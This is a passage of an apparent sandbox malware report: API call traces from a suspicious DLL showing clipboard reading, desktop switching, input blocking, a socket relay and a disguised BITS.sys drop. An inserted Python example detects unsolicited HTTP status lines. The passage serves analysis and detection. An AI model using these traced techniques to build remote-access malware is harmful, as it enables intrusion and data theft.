                                                          • RegQueryValueExA.ADVAPI32(00000050,Favorites,00000000,00000000,00000000,00000050), ref: 1002AE53
                                                          • RegCloseKey.ADVAPI32(?), ref: 1002AE5E
                                                          • LocalAlloc.KERNEL32(00000040,00002710), ref: 1002AE6B
                                                            • Part of subcall function 1002AB10: lstrcatA.KERNEL32(00000000,?), ref: 1002AB66
                                                            • Part of subcall function 1002AB10: lstrcatA.KERNEL32(00000000,\*.*), ref: 1002AB75
                                                            • Part of subcall function 1002AB10: FindFirstFileA.KERNEL32(00000000,?), ref: 1002AB91
                                                          • LocalReAlloc.KERNEL32(?,00000001,00000042), ref: 1002AEA0
                                                          Strings
                                                          • P, xrefs: 1002AE18
                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 1002AE28
                                                          • Favorites, xrefs: 1002AE4D
                                                          Similarity
                                                          • API ID: AllocLocallstrcat$CloseFileFindFirstOpenQueryValue
                                                          • String ID: Favorites$P$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                          • API String ID: 3779601296-2418616894
                                                          • Opcode ID: 77a076bccac00a8d07d799b2e314d9b45088ced6a2172ad6612087cac77b1a18
                                                          • Instruction ID: 29b25cf20e73e7ae371a8730182c3eca3561f8d3cee54ef10f52648635208b5d
                                                          • Opcode Fuzzy Hash: 77a076bccac00a8d07d799b2e314d9b45088ced6a2172ad6612087cac77b1a18
                                                          • Instruction Fuzzy Hash: 6B1191B4204305FFE305DF14CC86F9B7BA5FB88704F504E1DF658A26A1D7B8A4198B62
                                                          APIs
                                                            • Part of subcall function 100290C0: GetCurrentProcess.KERNEL32(00000028), ref: 100290D0
                                                            • Part of subcall function 100290C0: OpenProcessToken.ADVAPI32(00000000), ref: 100290D7
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 10029177
                                                          • Thread32First.KERNEL32(00000000,0000001C), ref: 10029184
                                                          • Thread32Next.KERNEL32(00000000,0000001C), ref: 1002919F
                                                          • OpenThread.KERNEL32(001F03FF,00000000,?,00000004,00000000), ref: 100291B2
                                                          • ResumeThread.KERNEL32(00000000), ref: 100291BB
                                                          • CloseHandle.KERNEL32(00000000), ref: 100291C2
                                                          • CloseHandle.KERNEL32(00000000,00000004,00000000), ref: 100291C5
                                                          Similarity
                                                          • API ID: CloseHandleOpenProcessThreadThread32$CreateCurrentFirstNextResumeSnapshotTokenToolhelp32
                                                          • String ID: SeDebugPrivilege
                                                          • API String ID: 2312015761-2896544425
                                                          • Opcode ID: 92575825664269da82754a126b87f41c0fa238dd4cdd121b5c861b03491c7cf0
                                                          • Instruction ID: 5baa37ad70a989ad156aa77d6f180d112f87292081aecf7063da644eb0796895
                                                          • Opcode Fuzzy Hash: 92575825664269da82754a126b87f41c0fa238dd4cdd121b5c861b03491c7cf0
                                                          • Instruction Fuzzy Hash: 9501A935244204BFF200EBA99C86FAF77A8FF85B90F844519FA0486281D671AD058BB7
                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,000F003F,?), ref: 10015221
                                                          • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000,?,00000000,000F003F,?), ref: 10015257
                                                          • LocalAlloc.KERNEL32(00000040,?,?,?,?,00000000,000F003F,?), ref: 100152AB
                                                          • malloc.MSVCRT ref: 100152EC
                                                          • malloc.MSVCRT ref: 100152F7
                                                          • RegEnumValueA.ADVAPI32(?,?,?,?,00000000,?,?,?), ref: 10015381
                                                          • free.MSVCRT ref: 10015418
                                                          • free.MSVCRT ref: 1001541F
                                                          • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 10015428
                                                          Similarity
                                                          • API ID: AllocLocalfreemalloc$EnumInfoOpenQueryValue
                                                          • String ID:
                                                          • API String ID: 1291067549-0
                                                          • Opcode ID: ea280062cf562dc1a7707fb89a94bf9855f2e4583b42d62e8aa87dba222f11ed
                                                          • Instruction ID: 402e0f5699eea022021b6c0871ab9ab74c7c4ee3b45ae780e4ac20626967f966
                                                          • Opcode Fuzzy Hash: ea280062cf562dc1a7707fb89a94bf9855f2e4583b42d62e8aa87dba222f11ed
                                                          • Instruction Fuzzy Hash: 6071D2716083059FD718CF28C880B6BBBE9FBC8745F484A1DF9859B350D671EA44CB52
                                                          APIs
                                                          • CreateRectRgnIndirect.GDI32(?), ref: 10018486
                                                          • GetRegionData.GDI32(00000000,00000000,00000000), ref: 1001851A
                                                          • #823.MFC42(00000000,?,?,?,?,?,?,00000001,?,?,?), ref: 1001851F
                                                          • GetRegionData.GDI32(00000000,00000000,00000000), ref: 10018530
                                                          • DeleteObject.GDI32(?), ref: 10018537
                                                          • #825.MFC42(00000000,00000000,00000000,?,?,00000001,?,?,?,?,?,?,?,?,?,10016B8A), ref: 10018547
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DataRegion$#823#825CreateDeleteIndirectObjectRect
                                                          • String ID:
                                                          • API String ID: 643377033-0
                                                          • Opcode ID: 001346d870f36c53a5a7599e2016c51c9870b5627219f4efa7edda646e5686e0
                                                          • Instruction ID: 3140f93dabf97cb7bd3e409eff6f417ecd497d9d1c0577791c74c40de05a7771
                                                          • Opcode Fuzzy Hash: 001346d870f36c53a5a7599e2016c51c9870b5627219f4efa7edda646e5686e0
                                                          • Instruction Fuzzy Hash: F85181B56087028BD314DF29D880A5BB7E6FFC8710F15492DF48ACB311EB74EA458B56
                                                          APIs
                                                          • GetWindowTextA.USER32(?,?,000003FF), ref: 10029EA4
                                                          • IsWindowVisible.USER32 ref: 10029EB3
                                                          • lstrlenA.KERNEL32(?), ref: 10029ECC
                                                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 10029EDF
                                                          • LocalSize.KERNEL32 ref: 10029EEF
                                                          • lstrlenA.KERNEL32(?), ref: 10029F0D
                                                          • LocalReAlloc.KERNEL32(?,?,00000042), ref: 10029F19
                                                          • GetWindowThreadProcessId.USER32(?), ref: 10029F26
                                                          • lstrlenA.KERNEL32(?,?,?,?,00000042), ref: 10029F34
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LocalWindowlstrlen$Alloc$ProcessSizeTextThreadVisible
                                                          • String ID:
                                                          • API String ID: 925664022-0
                                                          • Opcode ID: bdfcf0507623c4ea93ccd5645be1c1770e5c62d3ec9ad61f7fed79ab38ba254a
                                                          • Instruction ID: add1fb3533e99334b1788f801bc1a9e543b8ff74f7df4c1f04976087df14b6d6
                                                          • Opcode Fuzzy Hash: bdfcf0507623c4ea93ccd5645be1c1770e5c62d3ec9ad61f7fed79ab38ba254a
                                                          • Instruction Fuzzy Hash: 2621027A2003469BE750DF24CC84BEB77A8FB84750F84452DFE49A3240DA35A80AC771
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 1001656D
                                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 10016578
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,10098A46,000000FF,1000CC5B), ref: 10016589
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,00000000,10098A46,000000FF,1000CC5B), ref: 10016594
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,10098A46,000000FF,1000CC5B), ref: 100165A3
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,10098A46,000000FF,1000CC5B), ref: 100165AC
                                                          • ReleaseDC.USER32(00000000,?), ref: 100165B7
                                                            • Part of subcall function 100167E0: sprintf.MSVCRT ref: 1001682F
                                                            • Part of subcall function 100167E0: RegOpenKeyExA.ADVAPI32(?,?,00000000,00000002,?), ref: 1001686F
                                                            • Part of subcall function 100167E0: RegSetValueExA.ADVAPI32(?,SuppressDisableCompositionUI,00000000,00000004,?,00000004), ref: 1001688E
                                                            • Part of subcall function 100167E0: RegCloseKey.ADVAPI32(?), ref: 1001689D
                                                          • BlockInput.USER32(00000000,?,?,?,?,?,?,00000000,10098A46,000000FF,1000CC5B), ref: 100165CD
                                                          • DestroyCursor.USER32(00000000), ref: 1001660A
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close$ExchangeHandleInterlockedObjectSingleWait$BlockCursorDestroyInputOpenReleaseValuesprintf
                                                          • String ID:
                                                          • API String ID: 1142494416-0
                                                          • Opcode ID: 4ceefefdeb35724f5cd5cb8af09bc795719a28882878dd3cc17cf0b47423efc6
                                                          • Instruction ID: d4b191a7be4f08d6e559449bda8c86e8365c3d0bd4d75666bcc753f4c4a699e3
                                                          • Opcode Fuzzy Hash: 4ceefefdeb35724f5cd5cb8af09bc795719a28882878dd3cc17cf0b47423efc6
                                                          • Instruction Fuzzy Hash: 00212C752407049BE614DB64CC81BD6B3E8FF88720F154A1DF26A972D0CBB5B901CB91
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 1002C5E2
                                                          • GetThreadDesktop.USER32(00000000), ref: 1002C5E9
                                                          • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C61C
                                                          • OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 1002C627
                                                          • GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C64E
                                                          • lstrcmpiA.KERNEL32(?,?), ref: 1002C65D
                                                          • SetThreadDesktop.USER32(00000000), ref: 1002C668
                                                          • CloseDesktop.USER32(00000000), ref: 1002C680
                                                          • CloseDesktop.USER32(00000000), ref: 1002C683
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Desktop$Thread$CloseInformationObjectUser$CurrentInputOpenlstrcmpi
                                                          • String ID:
                                                          • API String ID: 3718465862-0
                                                          • Opcode ID: 346a97fe3b554d6ea7b4bbaf12baa1f8d932fbe5d70e927d73db7af9313f27ee
                                                          • Instruction ID: 7203b97fb3658a15e50f8a55408f95546fea7e3c6eec87968affc7e345bb74f4
                                                          • Opcode Fuzzy Hash: 346a97fe3b554d6ea7b4bbaf12baa1f8d932fbe5d70e927d73db7af9313f27ee
                                                          • Instruction Fuzzy Hash: B811EB751043196BF310DF68DC4AFDB77D8FB84700F010D19F64592191EBB4A549C7A6
                                                          APIs
                                                          • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B044,00000000,00000000), ref: 10010F11
                                                          • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B044,00000000,00000000), ref: 10010F1F
                                                          • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B044,00000000,00000000), ref: 10010F2C
                                                          • #541.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B044,00000000,00000000), ref: 10010F39
                                                          • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B044,00000000,00000000), ref: 10010F46
                                                          • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B044,00000000,00000000), ref: 10010F53
                                                          • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B044,00000000,00000000), ref: 10010F60
                                                          • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B044,00000000,00000000), ref: 10010F6D
                                                          • #540.MFC42(?,?,?,?,10098541,000000FF,10008360,1012B044,00000000,00000000), ref: 10010F90
                                                            • Part of subcall function 100110D0: #2614.MFC42(00000000,?), ref: 100110F5
                                                            • Part of subcall function 100110D0: #2614.MFC42(00000000,?), ref: 100110FD
                                                            • Part of subcall function 100110D0: #6143.MFC42(00000000,000000FF,00000000,?), ref: 10011110
                                                            • Part of subcall function 100110D0: #2614.MFC42(00000000,000000FF,00000000,?), ref: 1001111C
                                                            • Part of subcall function 100110D0: #860.MFC42(?,00000000,000000FF,00000000,000000FF,00000000,?), ref: 10011137
                                                            • Part of subcall function 100110D0: PathGetArgsA.SHLWAPI(00000000,?), ref: 10011172
                                                            • Part of subcall function 100110D0: #860.MFC42(00000000), ref: 1001117C
                                                            • Part of subcall function 100110D0: PathRemoveArgsA.SHLWAPI(00000000), ref: 10011186
                                                            • Part of subcall function 100110D0: PathUnquoteSpacesA.SHLWAPI(00000000,?), ref: 10011191
                                                            • Part of subcall function 100110D0: _splitpath.MSVCRT ref: 100111C5
                                                            • Part of subcall function 100110D0: #860.MFC42(?,?,?,?,?), ref: 100111D6
                                                            • Part of subcall function 100110D0: #860.MFC42(?,?,?,?,?,?), ref: 100111E8
                                                            • Part of subcall function 100110D0: #6876.MFC42(0000002F,0000005C,?,?,?,?,?,?), ref: 100111F3
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #540$#860$#2614Path$Args$#541#6143#6876RemoveSpacesUnquote_splitpath
                                                          • String ID:
                                                          • API String ID: 882339912-0
                                                          • Opcode ID: bcae64db62a9173b5de6d8cd2ae765ea97d72524f73a260d54af00dd520cab45
                                                          • Instruction ID: b1f006ec1c09e58242ba318f60969b2c11d84897468487acfae0c13bde89da3f
                                                          • Opcode Fuzzy Hash: bcae64db62a9173b5de6d8cd2ae765ea97d72524f73a260d54af00dd520cab45
                                                          • Instruction Fuzzy Hash: DB213B780057818ED354CF59D642B6AFBE4FF94B10F40491DE4DA83682DB74B508CBB2
                                                          APIs
                                                          • OpenClipboard.USER32(00000000), ref: 10017C2A
                                                          • GetClipboardData.USER32(00000001), ref: 10017C36
                                                          • CloseClipboard.USER32 ref: 10017C46
                                                          • GlobalSize.KERNEL32(00000000), ref: 10017C55
                                                          • GlobalLock.KERNEL32(00000000), ref: 10017C5F
                                                          • #823.MFC42(00000001), ref: 10017C68
                                                          • GlobalUnlock.KERNEL32(?), ref: 10017C8F
                                                          • CloseClipboard.USER32 ref: 10017C95
                                                          • #825.MFC42(00000000), ref: 10017CA7
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$Global$Close$#823#825DataLockOpenSizeUnlock
                                                          • String ID:
                                                          • API String ID: 15072309-0
                                                          • Opcode ID: e4c83fdc53078b23110fe99408f6848a6625d633b3bafd07e91433b67cd46e05
                                                          • Instruction ID: 9d338dc67493be82bb18043d65382f3dd730fbe0f51d25364675624cb99999ab
                                                          • Opcode Fuzzy Hash: e4c83fdc53078b23110fe99408f6848a6625d633b3bafd07e91433b67cd46e05
                                                          • Instruction Fuzzy Hash: E001D6395046246FE710EB649C89ADB37A8FF44651F490228FD0ED7250EB75E904C6F2
                                                          APIs
                                                          • OpenClipboard.USER32(00000000), ref: 10016F1A
                                                          • GetClipboardData.USER32(00000001), ref: 10016F26
                                                          • CloseClipboard.USER32 ref: 10016F36
                                                          • GlobalSize.KERNEL32(00000000), ref: 10016F45
                                                          • GlobalLock.KERNEL32(00000000), ref: 10016F4F
                                                          • #823.MFC42(00000001), ref: 10016F58
                                                          • GlobalUnlock.KERNEL32(?), ref: 10016F7F
                                                          • CloseClipboard.USER32 ref: 10016F85
                                                          • #825.MFC42(00000000), ref: 10016F97
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$Global$Close$#823#825DataLockOpenSizeUnlock
                                                          • String ID:
                                                          • API String ID: 15072309-0
                                                          • Opcode ID: 4072f59da86136a8181d21f34bb8e7e131716998d916dfe5853bc9eb5e6c99c2
                                                          • Instruction ID: 7427716a2ac4119ad4da49d555f0140185f668cd49e7d982ef33821d485bf08e
                                                          • Opcode Fuzzy Hash: 4072f59da86136a8181d21f34bb8e7e131716998d916dfe5853bc9eb5e6c99c2
                                                          • Instruction Fuzzy Hash: 2401DB395042246FE710EB64AC89AEB3798FF44701F484229FD0ED7200EB759904C6F1
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(1012C4E8), ref: 10022E6A
                                                          • LeaveCriticalSection.KERNEL32(1012C4E8), ref: 10022E82
                                                            • Part of subcall function 10022D10: _strnicmp.MSVCRT ref: 10022D24
                                                          • send.WS2_32(?,HTTP/1.0 200 OK,?,00000000), ref: 10022F1E
                                                          • send.WS2_32(?,?,00000000,00000000), ref: 10022F94
                                                          • CreateThread.KERNEL32(00000000,00000000,10023F60,?,00000000,?), ref: 10022FBC
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000000,00000000), ref: 10022FC9
                                                            • Part of subcall function 10022C80: atoi.MSVCRT(?), ref: 10022CB9
                                                            • Part of subcall function 100234D0: htons.WS2_32 ref: 100234F3
                                                            • Part of subcall function 100234D0: inet_addr.WS2_32(?), ref: 10023509
                                                            • Part of subcall function 100234D0: inet_addr.WS2_32(?), ref: 10023527
                                                            • Part of subcall function 100234D0: socket.WS2_32(00000002,00000001,00000006), ref: 10023533
                                                            • Part of subcall function 100234D0: setsockopt.WS2_32 ref: 1002355E
                                                            • Part of subcall function 100234D0: connect.WS2_32(?,?,00000010), ref: 1002356E
                                                            • Part of subcall function 100234D0: closesocket.WS2_32 ref: 1002357C
                                                          Similarity
                                                          • API ID: CriticalSectioninet_addrsend$CreateEnterLeaveObjectSingleThreadWait_strnicmpatoiclosesocketconnecthtonssetsockoptsocket
                                                          • String ID: HTTP/1.0 200 OK
                                                          • API String ID: 599367761-2989790534
                                                          • Opcode ID: dc5ab88c9d324263e74f874c0683124f639aa9fb6a98b0bc22b0b51417796fb7
                                                          • Instruction ID: 1c18553726d68fc3589e71ec96ae4793bdedeea414836eb10bbab6347bb9b08a
                                                          • Opcode Fuzzy Hash: dc5ab88c9d324263e74f874c0683124f639aa9fb6a98b0bc22b0b51417796fb7
                                                          • Instruction Fuzzy Hash: 3541E235604205ABD760DBA4ED84FAB77E8EB84350F514B28F94893184DA34ED45CBA2
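The block above shows the function sending the literal HTTP/1.0 200 OK with send() (ref 10022F1E), a second send(), CreateThread and WaitForSingleObject, while its subcall at 100234D0 builds a peer address with inet_addr/htons and calls socket, setsockopt and connect. Whether the sample uses that status line as a relay reply or as a beacon cannot be settled from these lines, but either way a bare "HTTP/1.0 200 OK" turns up on a flow where no HTTP request preceded it, or is emitted by the side that opened the connection. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it runs that check over constructed flow records (direction plus payload, written for this example) and reports why each status line looks wrong. The record layout and the reason strings are the example's own choices.

```python
import re
from dataclasses import dataclass, field

# Constructed flow records for this example (not data from the sandbox run).
# direction "c2s": bytes sent by the endpoint that initiated the TCP connection;
# "s2c": bytes sent by the endpoint that accepted it.
SAMPLE_FLOW_RECORDS = [
    # Ordinary HTTP: a request, then a status line with headers in reply.
    ("flow-1", "c2s", b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"),
    ("flow-1", "s2c", b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"),
    # The pattern in the trace: a bare status line, nothing was requested first.
    ("flow-2", "s2c", b"HTTP/1.0 200 OK"),
    ("flow-2", "c2s", b"\x01\x02\x03\x04"),
    # The connection initiator itself speaks the status line.
    ("flow-3", "c2s", b"HTTP/1.0 200 OK"),
]

# Request line: METHOD SP target SP HTTP/1.x CRLF. Status line: HTTP/1.x SP 3 digits.
REQUEST_LINE = re.compile(rb"^[A-Z]{3,7} \S+ HTTP/1\.[01]\r\n")
STATUS_LINE = re.compile(rb"^HTTP/1\.[01] \d{3}\b")


@dataclass
class FlowState:
    # Directions ("c2s"/"s2c") on which a well-formed HTTP request has been seen.
    request_seen_from: set = field(default_factory=set)


def status_line_reasons(direction, payload, state):
    """Return the reasons a status line on this flow looks anomalous (empty if none)."""
    reasons = []
    if direction == "c2s":
        reasons.append("status line sent by connection initiator")
    peer = "s2c" if direction == "c2s" else "c2s"
    if peer not in state.request_seen_from:
        reasons.append("unsolicited status line")
    if b"\r\n" not in payload:
        # A real response carries at least the CRLF that ends the status line.
        reasons.append("bare status line, no header terminator")
    return reasons


def analyse_flows(records):
    """Walk (flow_id, direction, payload) records in order; return (flow_id, direction, reasons)."""
    flows = {}
    findings = []
    for flow_id, direction, payload in records:
        state = flows.setdefault(flow_id, FlowState())
        if REQUEST_LINE.match(payload):
            state.request_seen_from.add(direction)
            continue
        if STATUS_LINE.match(payload):
            reasons = status_line_reasons(direction, payload, state)
            if reasons:
                findings.append((flow_id, direction, reasons))
    return findings


if __name__ == "__main__":
    for flow_id, direction, reasons in analyse_flows(SAMPLE_FLOW_RECORDS):
        print(f"{flow_id} [{direction}] {'; '.join(reasons)}")
```

flow-1 produces no finding; flow-2 and flow-3 are flagged. On real traffic the same three checks apply to the first payload in each direction of a flow, and a 15-byte "HTTP/1.0 200 OK" with no CRLF is the exact shape the send() at 10022F1E would put on the wire.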
                                                          APIs
                                                          • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1002C0AA
                                                          • lstrlenA.KERNEL32 ref: 1002C0C9
                                                          • WriteFile.KERNEL32(00000000,?,00000000), ref: 1002C0D2
                                                          • CloseHandle.KERNEL32(00000000), ref: 1002C0D9
                                                            • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCrkat,?,00000000,0000002E,00000001), ref: 10014D10
                                                            • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D19
                                                            • Part of subcall function 10014CA0: LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA), ref: 10014D27
                                                            • Part of subcall function 10014CA0: GetProcAddress.KERNEL32(00000000), ref: 10014D2A
                                                          Similarity
                                                          • API ID: AddressFileLibraryLoadProc$CloseCreateHandleWritelstrlen
                                                          • String ID: BITS$C:\ProgramData\Microsoft Drive\BITS.sys$TGByte\Setup
                                                          • API String ID: 46210954-946259135
                                                          • Opcode ID: 4aa8ea225159965a049aa2fe34a5fb1e8fa0c1b1fe3f4e01dfbb9777c5d44c70
